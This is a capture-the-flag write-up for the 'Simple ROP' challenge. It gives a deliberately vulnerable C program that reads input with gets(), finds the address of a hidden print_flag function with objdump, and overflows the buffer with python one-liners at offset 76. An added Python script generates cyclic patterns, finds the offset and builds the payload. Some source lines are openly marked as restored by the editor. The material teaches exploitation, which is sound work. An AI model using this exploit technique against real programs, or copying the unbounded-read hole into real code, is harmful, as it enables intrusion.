# Simple ROP - 120 Points

Read flag.txt



### Solution

###### Writeup by VoidMercy from phsst

We were given a binary and its source code. The listing below is the challenge source as reproduced on the page, with the braces that the extraction dropped put back; the call to `what_did_you_say()` from `main()` and the unbounded `gets()` read into `buff` are also missing from the page's copy and are restored here because the overflow the writeup exploits depends on them (the exact read call is an assumption).

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* getegid, setresgid */

void print_flag();
void what_did_you_say();

int main(int argc, char* argv[])
{
    /* drop to the effective gid so the flag file is readable via system() */
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    what_did_you_say();   /* restored: not present in the page's listing */
    return 0;
}

/* never called by the program itself: the target of the overwritten return address */
void print_flag()
{
    system("cat flag.txt");
}

void what_did_you_say()
{
    char buff[64];
    gets(buff);   /* restored (assumed): an unbounded read is what makes buff overflowable */
    printf("You said: %s\n", buff);
}
```

As the problem name suggests, this is a return-oriented problem, and the simplest kind: print_flag() is compiled into the binary but never called, so we only need a single "gadget", the function itself, and overwrite the saved return address with its address. We first get that address with:

```sh
objdump -d simplerop | grep "print_flag"
```

We find the address of print_flag to be 0x804851a.

Then we have to find the number of bytes from the start of buff to the saved return address, which is where `ret` pops the value into eip. After that filler we append the address of print_flag() in little-endian order (least-significant byte first, so 0x804851a becomes the four bytes \x1a\x85\x04\x08). The input is generated with python (python 2 syntax here) because those address bytes are not printable; `print` also appends a newline, which is what terminates the `gets()` read.

```sh
python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop   # no segfault: not enough bytes, the address never reached the saved return address

python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop   # got the flag
```

76 is a typical distance for a 64-byte array on 32-bit: the 12 extra bytes are the compiler's stack padding plus the saved ebp that sit between the end of buff and the return address. When the guess is wrong, a segfault (and, under gdb, eip containing 0x41414141) tells you the overwrite reached eip; no crash means it fell short.
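The two steps above, finding the offset and packing the address, are usually done less by guessing and more with a cyclic pattern: feed a sequence in which every 4-byte window is unique, read the value that lands in eip when it crashes, and look that value up to get the exact offset. The following is an added example, not code from the writeup; it reuses the page's address (0x804851a) and offset (76), models the crashing `ret` with a small `simulate_ret()` helper in place of a debugger (an assumption for demonstration), and refuses any payload containing 0x0a, since `gets()` would stop there.

```python
"""Offset discovery and payload building for the 32-bit ret2win above (added example)."""
import functools
import struct

# Values taken from the writeup: objdump reported print_flag at 0x804851a and
# the saved return address sat 76 bytes past the start of buff.
PRINT_FLAG_ADDR = 0x0804851A
RET_OFFSET = 76

# Lowercase alphabet for the cyclic pattern: 26**4 distinct 4-byte windows,
# far more than any realistic stack buffer needs.
PATTERN_ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Return the de Bruijn sequence B(k, n) over `alphabet` (k = len(alphabet)).

    Every n-byte window of the result is unique, which is what lets a crash
    value be mapped back to one exact offset (same idea as pwntools' cyclic()).
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the 4-byte-unique pattern: the crash-probe input."""
    return de_bruijn(PATTERN_ALPHABET, 4)[:length]


def cyclic_find(eip_value: int) -> int:
    """Map the 32-bit value that landed in eip back to its offset in the pattern.

    The value is searched as it sits in memory (little-endian), so pass the
    register value exactly as the debugger shows it. Returns -1 if absent.
    """
    return de_bruijn(PATTERN_ALPHABET, 4).find(struct.pack("<I", eip_value))


def simulate_ret(payload: bytes, ret_offset: int) -> int:
    """Model a 32-bit `ret` after an overflow (stand-in for gdb, constructed for
    this example): eip receives the 4 bytes `payload` wrote over the saved
    return address, read little-endian."""
    return struct.unpack("<I", payload[ret_offset:ret_offset + 4])[0]


def build_payload(ret_offset: int, target: int, filler: bytes = b"A") -> bytes:
    """Filler up to the saved return address, then `target` packed little-endian.

    gets() stops reading at a newline, so a 0x0a byte anywhere in the payload
    would truncate it; reject such payloads instead of silently shipping them.
    """
    payload = filler * ret_offset + struct.pack("<I", target)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a, which gets() treats as end of line")
    return payload


if __name__ == "__main__":
    import sys
    # usage: python3 exploit.py | ./simple-rop
    sys.stdout.buffer.write(build_payload(RET_OFFSET, PRINT_FLAG_ADDR) + b"\n")
```

To use it against the real binary, pipe `cyclic(200)` into the program under gdb, read eip at the crash, and pass that value to `cyclic_find()`; it returns 76 for this binary, after which `build_payload()` produces the same 80 bytes as the writeup's one-liner.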

## Flag


Original writeup (https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Simple%20ROP).